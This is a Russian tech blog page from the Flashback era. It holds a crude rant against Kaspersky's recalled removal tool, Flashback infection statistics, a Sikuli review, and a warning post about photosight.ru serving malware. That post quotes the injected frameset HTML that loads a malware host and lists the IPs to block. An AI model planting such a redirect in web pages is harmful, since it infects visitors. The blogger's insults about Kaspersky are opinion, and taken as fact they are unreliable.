Касперский в своем репердуаре

Я много раз лечил здоровые и зараженные компы путем выпиливания антивируса Касперского и установкой Dr.Web или NOD32. Всем давно известно, что Касперский скорее калечит систему, чем лечит. И вот снова, пиарясь на волне нового вируса под Java на OS X, Kaspersky жидко обосрались:

kasp3

Компания «Лаборатория Касперского» была вынуждена из-за критической ошибки отозвать первую версию своей бесплатной разработки Kaspersky Flashfake Removal Tool для борьбы с ботнетом Flashback, состоящим из компьютеров под управлением OS X. В ночь на 13 апреля была выпущена обновленная версия программы.

«Лаборатория Касперского» сообщила, что недавно выпущенный антивирусной компанией инструмент для удаления трояна, известного под названиями Flashback и Flashfake, поражающего компьютеры Apple под управлением OS X, оказался недоработанным и включал в себя ошибку.

Бесплатная программа от «Лаборатории Касперского» для удаления Flashback/Flashfake была выпущена на этой неделе. Она предназначена для удаления с компьютеров трояна, который, по информации экспертов в области компьютерной безопасности, уже заразил более 670 тыс. компьютеров по всему миру, став крупнейшим вирусом для OS X в истории.

via CNews

Чем ставить говно от Касперского, лучше удалить вирус вручную, как советуют в F-Secure, и установить Little Snitch. Проверить, есть ли вирус на компьютере можно самостоятельно. Запустите команду:

Читать остальную часть заметки »

Теги: , , , , , , , ,

Вирусы на OS X и рюшечки Windows 8

Специалисты компании «Доктор Веб» — российского разработчика средств информационной безопасности — провели специальное исследование, позволившее оценить картину распространения троянской программы BackDoor.Flashback, заражающей компьютеры, работающие под управлением операционной системы Mac OS X. Сейчас в ботнете BackDoor.Flashback действует более 550 000 инфицированных рабочих станций, большая часть которых расположена на территории США и Канады. Это в очередной раз опровергает заявления некоторых экспертов об отсутствии угроз для пользователей «маков».

MSN тут же округлила цифру до 600 000:

Исследование компании Dr Web показало, что около 600 тысяч компьютеров Mac заразились вирусом, позволяющим кражу данных и использование данных компьютеров в качестве ботнетов — компьютерных сетей для нелегальной деятельности, таких как рассылка спама или перебор паролей.

Компания F-Secure, занимающаяся компьютерной безопасностью, также опубликовала подробные инструкции о том, "как распознать, что ваш компьютер заражен, и как избавиться от вируса Trojan".

Читать остальную часть заметки »

Теги: , , , , ,

Осторожно, вирусы

Сайт photosight.ru сегодня радует своих посетителей java-вирусом. Браузер открывает страницу по коду: <html><frameset rows="100%"><frame src="http://194.8.250.211/tds/in.cgi?2"></frameset></html> и скачивает вирус. Рекомендую заблокировать следующие адреса:
178.63.170.185 (код)
194.8.250.213 (код)
194.8.250.211 (тело вируса)

Сайт уже попал в черный список Google и браузеры выводят предупреждающую страницу.

Как именно подгружается скрипт пока не наковырял, предполагаю, что есть уязвимость в рекламной (баннерной) системе openx1.photosight.ru.

UPDATE

Зараженный файл: http://openx1.photosight.ru/www/delivery/ajs.php

Написал письмо в службу поддержки сайта.


Теги: , , , , , , , ,

Java forever

“Java 4-ever” – смотрите на всех популярных платформах мира!


Теги: , , , , , ,

Sikuli: управление компьютером с помощью скриптов

У вас когда-нибудь возникала необходимость выполнить какую-то задачу в заданное время? И желательно без личного присутствия? У меня возникала. Конечно, Windows поддерживает командные bat- и cmd-файлы, но зачастую одного запуска программы не достаточно, нужно что-то в запущенной программе покликать. Вот здесь и наступало разочарование. Данная ситуация актуальна пожалуй для всех ОС, будь то Linux, Mac OS X или FreeBSD.

Сегодня случайно нашел оригинальное и поистине замечательное решение: Sikuli.

Sikuli

Sikuli позволяет писать скрипты для управления любыми программами операционной системы всем людям, даже тем, у кого нет навыков или опыта программирования или написания скриптов. Программа использует простые операторы (команды), такие как “кликнуть”, “напечатать” и “подождать”, а в качестве операндов выступают скриншоты областей или объектов, с которыми необходимо производить манипуляции. Вот так, революционно, наглядно и просто! Для понимания как это работает, посмотрите видео, все понятно даже без перевода. Правда операторы выучить все равно придется)).

Разработчики подготовили массу примеров и хорошую документацию, так что с освоением программы, думаю, проблем быть не должно. К тому же, самый приятный момент это полная бесплатность данной программы!

Sikuli официально поддерживает Windows, Mac OS X и Linux.

P.S.

Для фанатов и маньяков: Sikuli написан на Java, поддерживает все платформы и его исходный код открыт 🙂


Теги: , , , , , , ,